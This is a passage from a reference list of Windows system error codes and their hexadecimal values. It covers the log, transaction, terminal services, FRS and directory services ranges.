0x19E5 - ERROR_LOG_MULTIPLEXED = 0x19E6 - ERROR_LOG_DEDICATED = 0x19E7 - ERROR_LOG_ARCHIVE_NOT_IN_PROGRESS = 0x19E8 - ERROR_LOG_ARCHIVE_IN_PROGRESS = 0x19E9 - ERROR_LOG_EPHEMERAL = 0x19EA - ERROR_LOG_NOT_ENOUGH_CONTAINERS = 0x19EB - ERROR_LOG_CLIENT_ALREADY_REGISTERED = 0x19EC - ERROR_LOG_CLIENT_NOT_REGISTERED = 0x19ED - ERROR_LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE - ERROR_LOG_CONTAINER_READ_FAILED = 0x19EF - ERROR_LOG_CONTAINER_WRITE_FAILED = 0x19F0 - ERROR_LOG_CONTAINER_OPEN_FAILED = 0x19F1 - ERROR_LOG_CONTAINER_STATE_INVALID = 0x19F2 - ERROR_LOG_STATE_INVALID = 0x19F3 - ERROR_LOG_PINNED = 0x19F4 - ERROR_LOG_METADATA_FLUSH_FAILED = 0x19F5 - ERROR_LOG_INCONSISTENT_SECURITY = 0x19F6 - ERROR_LOG_APPENDED_FLUSH_FAILED = 0x19F7 - ERROR_LOG_PINNED_RESERVATION = 0x19F8 - ERROR_INVALID_TRANSACTION = 0x1A2C - ERROR_TRANSACTION_NOT_ACTIVE = 0x1A2D - ERROR_TRANSACTION_REQUEST_NOT_VALID = 0x1A2E - ERROR_TRANSACTION_NOT_REQUESTED = 0x1A2F - ERROR_TRANSACTION_ALREADY_ABORTED = 0x1A30 - ERROR_TRANSACTION_ALREADY_COMMITTED = 0x1A31 - ERROR_TM_INITIALIZATION_FAILED = 0x1A32 - ERROR_RESOURCEMANAGER_READ_ONLY = 0x1A33 - ERROR_TRANSACTION_NOT_JOINED = 0x1A34 - ERROR_TRANSACTION_SUPERIOR_EXISTS = 0x1A35 - ERROR_CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 - ERROR_TRANSACTION_PROPAGATION_FAILED = 0x1A37 - ERROR_CRM_PROTOCOL_NOT_FOUND = 0x1A38 - ERROR_TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 - ERROR_CURRENT_TRANSACTION_NOT_VALID = 0x1A3A - ERROR_TRANSACTION_NOT_FOUND = 0x1A3B - ERROR_RESOURCEMANAGER_NOT_FOUND = 0x1A3C - ERROR_ENLISTMENT_NOT_FOUND = 0x1A3D - ERROR_TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E - ERROR_TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F - ERROR_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 - ERROR_TRANSACTION_NOT_ROOT = 0x1A41 - ERROR_TRANSACTION_OBJECT_EXPIRED = 0x1A42 - ERROR_TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 - ERROR_TRANSACTION_RECORD_TOO_LONG = 0x1A44 - ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 - ERROR_TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 - ERROR_TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 - ERROR_RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 - ERROR_TRANSACTION_MUST_WRITETHROUGH = 0x1A49 - ERROR_TRANSACTION_NO_SUPERIOR = 0x1A4A - ERROR_HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B - ERROR_TRANSACTIONAL_CONFLICT = 0x1A90 - ERROR_RM_NOT_ACTIVE = 0x1A91 - ERROR_RM_METADATA_CORRUPT = 0x1A92 - ERROR_DIRECTORY_NOT_RM = 0x1A93 - ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 - ERROR_LOG_RESIZE_INVALID_SIZE = 0x1A96 - ERROR_OBJECT_NO_LONGER_EXISTS = 0x1A97 - ERROR_STREAM_MINIVERSION_NOT_FOUND = 0x1A98 - ERROR_STREAM_MINIVERSION_NOT_VALID = 0x1A99 - ERROR_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A - ERROR_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B - ERROR_CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C - ERROR_REMOTE_FILE_VERSION_MISMATCH = 0x1A9E - ERROR_HANDLE_NO_LONGER_VALID = 0x1A9F - ERROR_NO_TXF_METADATA = 0x1AA0 - ERROR_LOG_CORRUPTION_DETECTED = 0x1AA1 - ERROR_CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 - ERROR_RM_DISCONNECTED = 0x1AA3 - ERROR_ENLISTMENT_NOT_SUPERIOR = 0x1AA4 - ERROR_RECOVERY_NOT_NEEDED = 0x1AA5 - ERROR_RM_ALREADY_STARTED = 0x1AA6 - ERROR_FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 - ERROR_CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 - ERROR_CANT_CROSS_RM_BOUNDARY = 0x1AA9 - ERROR_TXF_DIR_NOT_EMPTY = 0x1AAA - ERROR_INDOUBT_TRANSACTIONS_EXIST = 0x1AAB - ERROR_TM_VOLATILE = 0x1AAC - ERROR_ROLLBACK_TIMER_EXPIRED = 0x1AAD - ERROR_TXF_ATTRIBUTE_CORRUPT = 0x1AAE - ERROR_EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF - ERROR_TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 - ERROR_LOG_GROWTH_FAILED = 0x1AB1 - ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 - ERROR_TXF_METADATA_ALREADY_PRESENT = 0x1AB3 - ERROR_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 - ERROR_TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 - ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 - ERROR_TRANSACTIONS_NOT_FROZEN = 0x1AB7 - ERROR_TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 - ERROR_NOT_SNAPSHOT_VOLUME = 0x1AB9 - ERROR_NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA - ERROR_DATA_LOST_REPAIR = 0x1ABB - ERROR_SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC - ERROR_TM_IDENTITY_MISMATCH = 0x1ABD - ERROR_FLOATED_SECTION = 0x1ABE - ERROR_CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF - ERROR_CANNOT_ABORT_TRANSACTIONS = 0x1AC0 - ERROR_BAD_CLUSTERS = 0x1AC1 - ERROR_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 - ERROR_VOLUME_DIRTY = 0x1AC3 - ERROR_NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 - ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 - ERROR_EXPIRED_HANDLE = 0x1AC6 - ERROR_TRANSACTION_NOT_ENLISTED = 0x1AC7 - ERROR_CTX_WINSTATION_NAME_INVALID = 0x1B59 - ERROR_CTX_INVALID_PD = 0x1B5A - ERROR_CTX_PD_NOT_FOUND = 0x1B5B - ERROR_CTX_WD_NOT_FOUND = 0x1B5C - ERROR_CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D - ERROR_CTX_SERVICE_NAME_COLLISION = 0x1B5E - ERROR_CTX_CLOSE_PENDING = 0x1B5F - ERROR_CTX_NO_OUTBUF = 0x1B60 - ERROR_CTX_MODEM_INF_NOT_FOUND = 0x1B61 - ERROR_CTX_INVALID_MODEMNAME = 0x1B62 - ERROR_CTX_MODEM_RESPONSE_ERROR = 0x1B63 - ERROR_CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 - ERROR_CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 - ERROR_CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 - ERROR_CTX_MODEM_RESPONSE_BUSY = 0x1B67 - ERROR_CTX_MODEM_RESPONSE_VOICE = 0x1B68 - ERROR_CTX_TD_ERROR = 0x1B69 - ERROR_CTX_WINSTATION_NOT_FOUND = 0x1B6E - ERROR_CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F - ERROR_CTX_WINSTATION_BUSY = 0x1B70 - ERROR_CTX_BAD_VIDEO_MODE = 0x1B71 - ERROR_CTX_GRAPHICS_INVALID = 0x1B7B - ERROR_CTX_LOGON_DISABLED = 0x1B7D - ERROR_CTX_NOT_CONSOLE = 0x1B7E - ERROR_CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 - ERROR_CTX_CONSOLE_DISCONNECT = 0x1B81 - ERROR_CTX_CONSOLE_CONNECT = 0x1B82 - ERROR_CTX_SHADOW_DENIED = 0x1B84 - ERROR_CTX_WINSTATION_ACCESS_DENIED = 0x1B85 - ERROR_CTX_INVALID_WD = 0x1B89 - ERROR_CTX_SHADOW_INVALID = 0x1B8A - ERROR_CTX_SHADOW_DISABLED = 0x1B8B - ERROR_CTX_CLIENT_LICENSE_IN_USE = 0x1B8C - ERROR_CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D - ERROR_CTX_LICENSE_NOT_AVAILABLE = 0x1B8E - ERROR_CTX_LICENSE_CLIENT_INVALID = 0x1B8F - ERROR_CTX_LICENSE_EXPIRED = 0x1B90 - ERROR_CTX_SHADOW_NOT_RUNNING = 0x1B91 - ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 - ERROR_ACTIVATION_COUNT_EXCEEDED = 0x1B93 - ERROR_CTX_WINSTATIONS_DISABLED = 0x1B94 - ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 - ERROR_CTX_SESSION_IN_USE = 0x1B96 - ERROR_CTX_NO_FORCE_LOGOFF = 0x1B97 - ERROR_CTX_ACCOUNT_RESTRICTION = 0x1B98 - ERROR_RDP_PROTOCOL_ERROR = 0x1B99 - ERROR_CTX_CDM_CONNECT = 0x1B9A - ERROR_CTX_CDM_DISCONNECT = 0x1B9B - ERROR_CTX_SECURITY_LAYER_ERROR = 0x1B9C - ERROR_TS_INCOMPATIBLE_SESSIONS = 0x1B9D - ERROR_TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E - FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 - FRS_ERR_STARTING_SERVICE = 0x1F42 - FRS_ERR_STOPPING_SERVICE = 0x1F43 - FRS_ERR_INTERNAL_API = 0x1F44 - FRS_ERR_INTERNAL = 0x1F45 - FRS_ERR_SERVICE_COMM = 0x1F46 - FRS_ERR_INSUFFICIENT_PRIV = 0x1F47 - FRS_ERR_AUTHENTICATION = 0x1F48 - FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x1F49 - FRS_ERR_PARENT_AUTHENTICATION = 0x1F4A - FRS_ERR_CHILD_TO_PARENT_COMM = 0x1F4B - FRS_ERR_PARENT_TO_CHILD_COMM = 0x1F4C - FRS_ERR_SYSVOL_POPULATE = 0x1F4D - FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x1F4E - FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F - FRS_ERR_SYSVOL_DEMOTE = 0x1F50 - FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 - ERROR_DS_NOT_INSTALLED = 0x2008 - ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 - ERROR_DS_NO_ATTRIBUTE_OR_VALUE = 0x200A - ERROR_DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B - ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C - ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D - ERROR_DS_BUSY = 0x200E - ERROR_DS_UNAVAILABLE = 0x200F - ERROR_DS_NO_RIDS_ALLOCATED = 0x2010 - ERROR_DS_NO_MORE_RIDS = 0x2011 - ERROR_DS_INCORRECT_ROLE_OWNER = 0x2012 - ERROR_DS_RIDMGR_INIT_ERROR = 0x2013 - ERROR_DS_OBJ_CLASS_VIOLATION = 0x2014 - ERROR_DS_CANT_ON_NON_LEAF = 0x2015 - ERROR_DS_CANT_ON_RDN = 0x2016 - ERROR_DS_CANT_MOD_OBJ_CLASS = 0x2017 - ERROR_DS_CROSS_DOM_MOVE_ERROR = 0x2018 - ERROR_DS_GC_NOT_AVAILABLE = 0x2019 - ERROR_SHARED_POLICY = 0x201A - ERROR_POLICY_OBJECT_NOT_FOUND = 0x201B - ERROR_POLICY_ONLY_IN_DS = 0x201C - ERROR_PROMOTION_ACTIVE = 0x201D - ERROR_NO_PROMOTION_ACTIVE = 0x201E - ERROR_DS_OPERATIONS_ERROR = 0x2020 - ERROR_DS_PROTOCOL_ERROR = 0x2021 - ERROR_DS_TIMELIMIT_EXCEEDED = 0x2022 - ERROR_DS_SIZELIMIT_EXCEEDED = 0x2023 - ERROR_DS_ADMIN_LIMIT_EXCEEDED = 0x2024 - ERROR_DS_COMPARE_FALSE = 0x2025 - ERROR_DS_COMPARE_TRUE = 0x2026 - ERROR_DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 - ERROR_DS_STRONG_AUTH_REQUIRED = 0x2028 - ERROR_DS_INAPPROPRIATE_AUTH = 0x2029 - ERROR_DS_AUTH_UNKNOWN = 0x202A - ERROR_DS_REFERRAL = 0x202B - ERROR_DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C - ERROR_DS_CONFIDENTIALITY_REQUIRED = 0x202D - ERROR_DS_INAPPROPRIATE_MATCHING = 0x202E - ERROR_DS_CONSTRAINT_VIOLATION = 0x202F - ERROR_DS_NO_SUCH_OBJECT = 0x2030 - ERROR_DS_ALIAS_PROBLEM = 0x2031 - ERROR_DS_INVALID_DN_SYNTAX = 0x2032 - ERROR_DS_IS_LEAF = 0x2033 - ERROR_DS_ALIAS_DEREF_PROBLEM = 0x2034 - ERROR_DS_UNWILLING_TO_PERFORM = 0x2035 - ERROR_DS_LOOP_DETECT = 0x2036 - ERROR_DS_NAMING_VIOLATION = 0x2037 - ERROR_DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 - ERROR_DS_AFFECTS_MULTIPLE_DSAS = 0x2039 - ERROR_DS_SERVER_DOWN = 0x203A - ERROR_DS_LOCAL_ERROR = 0x203B - ERROR_DS_ENCODING_ERROR = 0x203C - ERROR_DS_DECODING_ERROR = 0x203D - ERROR_DS_FILTER_UNKNOWN = 0x203E - ERROR_DS_PARAM_ERROR = 0x203F - ERROR_DS_NOT_SUPPORTED = 0x2040 - ERROR_DS_NO_RESULTS_RETURNED = 0x2041 - ERROR_DS_CONTROL_NOT_FOUND = 0x2042 - ERROR_DS_CLIENT_LOOP = 0x2043 - ERROR_DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 - ERROR_DS_SORT_CONTROL_MISSING = 0x2045 - ERROR_DS_OFFSET_RANGE_ERROR = 0x2046 - ERROR_DS_ROOT_MUST_BE_NC = 0x206D - ERROR_DS_ADD_REPLICA_INHIBITED = 0x206E - ERROR_DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F - ERROR_DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 - ERROR_DS_OBJ_STRING_NAME_EXISTS = 0x2071 - ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 - ERROR_DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 - ERROR_DS_NO_REQUESTED_ATTS_FOUND = 0x2074 - ERROR_DS_USER_BUFFER_TO_SMALL = 0x2075 - ERROR_DS_ATT_IS_NOT_ON_OBJ = 0x2076 - ERROR_DS_ILLEGAL_MOD_OPERATION = 0x2077 - ERROR_DS_OBJ_TOO_LARGE = 0x2078 - ERROR_DS_BAD_INSTANCE_TYPE = 0x2079 - ERROR_DS_MASTERDSA_REQUIRED = 0x207A - ERROR_DS_OBJECT_CLASS_REQUIRED = 0x207B - ERROR_DS_MISSING_REQUIRED_ATT = 0x207C - ERROR_DS_ATT_NOT_DEF_FOR_CLASS = 0x207D - ERROR_DS_ATT_ALREADY_EXISTS = 0x207E - ERROR_DS_CANT_ADD_ATT_VALUES = 0x2080 - ERROR_DS_SINGLE_VALUE_CONSTRAINT = 0x2081 - ERROR_DS_RANGE_CONSTRAINT = 0x2082 - ERROR_DS_ATT_VAL_ALREADY_EXISTS = 0x2083 - ERROR_DS_CANT_REM_MISSING_ATT = 0x2084 - ERROR_DS_CANT_REM_MISSING_ATT_VAL = 0x2085 - ERROR_DS_ROOT_CANT_BE_SUBREF = 0x2086 - ERROR_DS_NO_CHAINING = 0x2087 - ERROR_DS_NO_CHAINED_EVAL = 0x2088 - ERROR_DS_NO_PARENT_OBJECT = 0x2089 - ERROR_DS_PARENT_IS_AN_ALIAS = 0x208A - ERROR_DS_CANT_MIX_MASTER_AND_REPS = 0x208B - ERROR_DS_CHILDREN_EXIST = 0x208C - ERROR_DS_OBJ_NOT_FOUND = 0x208D - ERROR_DS_ALIASED_OBJ_MISSING = 0x208E - ERROR_DS_BAD_NAME_SYNTAX = 0x208F - ERROR_DS_ALIAS_POINTS_TO_ALIAS = 0x2090 - ERROR_DS_CANT_DEREF_ALIAS = 0x2091 - ERROR_DS_OUT_OF_SCOPE = 0x2092 - ERROR_DS_CANT_DELETE_DSA_OBJ = 0x2094 - ERROR_DS_GENERIC_ERROR = 0x2095 - ERROR_DS_DSA_MUST_BE_INT_MASTER = 0x2096 - ERROR_DS_CLASS_NOT_DSA = 0x2097 - ERROR_DS_INSUFF_ACCESS_RIGHTS = 0x2098 - ERROR_DS_ILLEGAL_SUPERIOR = 0x2099 - ERROR_DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A - ERROR_DS_NAME_TOO_MANY_PARTS = 0x209B - ERROR_DS_NAME_TOO_LONG = 0x209C - ERROR_DS_NAME_VALUE_TOO_LONG = 0x209D - ERROR_DS_NAME_UNPARSEABLE = 0x209E - ERROR_DS_NAME_TYPE_UNKNOWN = 0x209F - ERROR_DS_NOT_AN_OBJECT = 0x20A0 - ERROR_DS_SEC_DESC_TOO_SHORT = 0x20A1 - ERROR_DS_SEC_DESC_INVALID = 0x20A2 - ERROR_DS_NO_DELETED_NAME = 0x20A3 - ERROR_DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 - ERROR_DS_NCNAME_MUST_BE_NC = 0x20A5 - ERROR_DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 - ERROR_DS_CLASS_MUST_BE_CONCRETE = 0x20A7 - ERROR_DS_INVALID_DMD = 0x20A8 - ERROR_DS_OBJ_GUID_EXISTS = 0x20A9 - ERROR_DS_NOT_ON_BACKLINK = 0x20AA - ERROR_DS_NO_CROSSREF_FOR_NC = 0x20AB - ERROR_DS_SHUTTING_DOWN = 0x20AC - ERROR_DS_UNKNOWN_OPERATION = 0x20AD - ERROR_DS_INVALID_ROLE_OWNER = 0x20AE - ERROR_DS_COULDNT_CONTACT_FSMO = 0x20AF - ERROR_DS_CROSS_NC_DN_RENAME = 0x20B0 - ERROR_DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 - ERROR_DS_REPLICATOR_ONLY = 0x20B2 - ERROR_DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 - ERROR_DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 - ERROR_DS_NAME_REFERENCE_INVALID = 0x20B5 - ERROR_DS_CROSS_REF_EXISTS = 0x20B6 - ERROR_DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 - ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 - ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 - ERROR_DS_DUP_RDN = 0x20BA - ERROR_DS_DUP_OID = 0x20BB - ERROR_DS_DUP_MAPI_ID = 0x20BC - ERROR_DS_DUP_SCHEMA_ID_GUID = 0x20BD - ERROR_DS_DUP_LDAP_DISPLAY_NAME = 0x20BE - ERROR_DS_SEMANTIC_ATT_TEST = 0x20BF - ERROR_DS_SYNTAX_MISMATCH = 0x20C0 - ERROR_DS_EXISTS_IN_MUST_HAVE = 0x20C1 - ERROR_DS_EXISTS_IN_MAY_HAVE = 0x20C2 - ERROR_DS_NONEXISTENT_MAY_HAVE = 0x20C3 - ERROR_DS_NONEXISTENT_MUST_HAVE = 0x20C4 - ERROR_DS_AUX_CLS_TEST_FAIL = 0x20C5 - ERROR_DS_NONEXISTENT_POSS_SUP = 0x20C6 - ERROR_DS_SUB_CLS_TEST_FAIL = 0x20C7 - ERROR_DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 - ERROR_DS_EXISTS_IN_AUX_CLS = 0x20C9 - ERROR_DS_EXISTS_IN_SUB_CLS = 0x20CA - ERROR_DS_EXISTS_IN_POSS_SUP = 0x20CB - ERROR_DS_RECALCSCHEMA_FAILED = 0x20CC - ERROR_DS_TREE_DELETE_NOT_FINISHED = 0x20CD - ERROR_DS_CANT_DELETE = 0x20CE - ERROR_DS_ATT_SCHEMA_REQ_ID = 0x20CF - ERROR_DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 - ERROR_DS_CANT_CACHE_ATT = 0x20D1 - ERROR_DS_CANT_CACHE_CLASS = 0x20D2 - ERROR_DS_CANT_REMOVE_ATT_CACHE = 0x20D3 - ERROR_DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 - ERROR_DS_CANT_RETRIEVE_DN = 0x20D5 - ERROR_DS_MISSING_SUPREF = 0x20D6 - ERROR_DS_CANT_RETRIEVE_INSTANCE = 0x20D7 - ERROR_DS_CODE_INCONSISTENCY = 0x20D8 - ERROR_DS_DATABASE_ERROR = 0x20D9 - ERROR_DS_GOVERNSID_MISSING = 0x20DA - ERROR_DS_MISSING_EXPECTED_ATT = 0x20DB - ERROR_DS_NCNAME_MISSING_CR_REF = 0x20DC - ERROR_DS_SECURITY_CHECKING_ERROR = 0x20DD - ERROR_DS_SCHEMA_NOT_LOADED = 0x20DE - ERROR_DS_SCHEMA_ALLOC_FAILED = 0x20DF - ERROR_DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 - ERROR_DS_GCVERIFY_ERROR = 0x20E1 - ERROR_DS_DRA_SCHEMA_MISMATCH = 0x20E2 - ERROR_DS_CANT_FIND_DSA_OBJ = 0x20E3 - ERROR_DS_CANT_FIND_EXPECTED_NC = 0x20E4 - ERROR_DS_CANT_FIND_NC_IN_CACHE = 0x20E5 - ERROR_DS_CANT_RETRIEVE_CHILD = 0x20E6 - ERROR_DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 - ERROR_DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 - ERROR_DS_BAD_HIERARCHY_FILE = 0x20E9 - ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA - ERROR_DS_CONFIG_PARAM_MISSING = 0x20EB - ERROR_DS_COUNTING_AB_INDICES_FAILED = 0x20EC - ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED - ERROR_DS_INTERNAL_FAILURE = 0x20EE - ERROR_DS_UNKNOWN_ERROR = 0x20EF - ERROR_DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 - ERROR_DS_REFUSING_FSMO_ROLES = 0x20F1 - ERROR_DS_MISSING_FSMO_SETTINGS = 0x20F2 - ERROR_DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 - ERROR_DS_DRA_GENERIC = 0x20F4 - ERROR_DS_DRA_INVALID_PARAMETER = 0x20F5 - ERROR_DS_DRA_BUSY = 0x20F6 - ERROR_DS_DRA_BAD_DN = 0x20F7 - ERROR_DS_DRA_BAD_NC = 0x20F8 - ERROR_DS_DRA_DN_EXISTS = 0x20F9 - ERROR_DS_DRA_INTERNAL_ERROR = 0x20FA - ERROR_DS_DRA_INCONSISTENT_DIT = 0x20FB - ERROR_DS_DRA_CONNECTION_FAILED = 0x20FC - ERROR_DS_DRA_BAD_INSTANCE_TYPE = 0x20FD - ERROR_DS_DRA_OUT_OF_MEM = 0x20FE - ERROR_DS_DRA_MAIL_PROBLEM = 0x20FF - ERROR_DS_DRA_REF_ALREADY_EXISTS = 0x2100 - ERROR_DS_DRA_REF_NOT_FOUND = 0x2101 - ERROR_DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 - ERROR_DS_DRA_DB_ERROR = 0x2103 - ERROR_DS_DRA_NO_REPLICA = 0x2104 - ERROR_DS_DRA_ACCESS_DENIED = 0x2105 - ERROR_DS_DRA_NOT_SUPPORTED = 0x2106 - ERROR_DS_DRA_RPC_CANCELLED = 0x2107 - ERROR_DS_DRA_SOURCE_DISABLED = 0x2108 - ERROR_DS_DRA_SINK_DISABLED = 0x2109 - ERROR_DS_DRA_NAME_COLLISION = 0x210A - ERROR_DS_DRA_SOURCE_REINSTALLED = 0x210B - ERROR_DS_DRA_MISSING_PARENT = 0x210C - ERROR_DS_DRA_PREEMPTED = 0x210D - ERROR_DS_DRA_ABANDON_SYNC = 0x210E - ERROR_DS_DRA_SHUTDOWN = 0x210F - ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 - ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 - ERROR_DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 - ERROR_DS_INSTALL_SCHEMA_MISMATCH = 0x2113 - ERROR_DS_DUP_LINK_ID = 0x2114 - ERROR_DS_NAME_ERROR_RESOLVING = 0x2115 - ERROR_DS_NAME_ERROR_NOT_FOUND = 0x2116 - ERROR_DS_NAME_ERROR_NOT_UNIQUE = 0x2117 - ERROR_DS_NAME_ERROR_NO_MAPPING = 0x2118 - ERROR_DS_NAME_ERROR_DOMAIN_ONLY = 0x2119 - ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING = 0x211A - ERROR_DS_CONSTRUCTED_ATT_MOD = 0x211B - ERROR_DS_WRONG_OM_OBJ_CLASS = 0x211C - ERROR_DS_DRA_REPL_PENDING = 0x211D - ERROR_DS_DS_REQUIRED = 0x211E - ERROR_DS_INVALID_LDAP_DISPLAY_NAME = 0x211F - ERROR_DS_NON_BASE_SEARCH = 0x2120 - ERROR_DS_CANT_RETRIEVE_ATTS = 0x2121 - ERROR_DS_BACKLINK_WITHOUT_LINK = 0x2122 - ERROR_DS_EPOCH_MISMATCH = 0x2123 - ERROR_DS_SRC_NAME_MISMATCH = 0x2124 - ERROR_DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 - ERROR_DS_DST_NC_MISMATCH = 0x2126 - ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 - ERROR_DS_SRC_GUID_MISMATCH = 0x2128 - ERROR_DS_CANT_MOVE_DELETED_OBJECT = 0x2129 - ERROR_DS_PDC_OPERATION_IN_PROGRESS = 0x212A - ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B - ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C - ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D - ERROR_DS_NC_MUST_HAVE_NC_PARENT = 0x212E - ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F - ERROR_DS_DST_DOMAIN_NOT_NATIVE = 0x2130 - ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 - ERROR_DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 - ERROR_DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 - ERROR_DS_INVALID_SEARCH_FLAG = 0x2134 - ERROR_DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 - ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 - ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 - ERROR_DS_SAM_INIT_FAILURE = 0x2138 - ERROR_DS_SENSITIVE_GROUP_VIOLATION = 0x2139 - ERROR_DS_CANT_MOD_PRIMARYGROUPID = 0x213A - ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B - ERROR_DS_NONSAFE_SCHEMA_CHANGE = 0x213C - ERROR_DS_SCHEMA_UPDATE_DISALLOWED = 0x213D - ERROR_DS_CANT_CREATE_UNDER_SCHEMA = 0x213E - ERROR_DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F - ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 - ERROR_DS_INVALID_GROUP_TYPE = 0x2141 - ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 - ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 - ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 - ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 - ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 - ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 - ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 - ERROR_DS_HAVE_PRIMARY_MEMBERS = 0x2149 - ERROR_DS_STRING_SD_CONVERSION_FAILED = 0x214A - ERROR_DS_NAMING_MASTER_GC = 0x214B - ERROR_DS_LOOKUP_FAILURE = 0x214C - ERROR_DS_COULDNT_UPDATE_SPNS = 0x214D - ERROR_DS_CANT_RETRIEVE_SD = 0x214E - ERROR_DS_KEY_NOT_UNIQUE = 0x214F - ERROR_DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 - ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 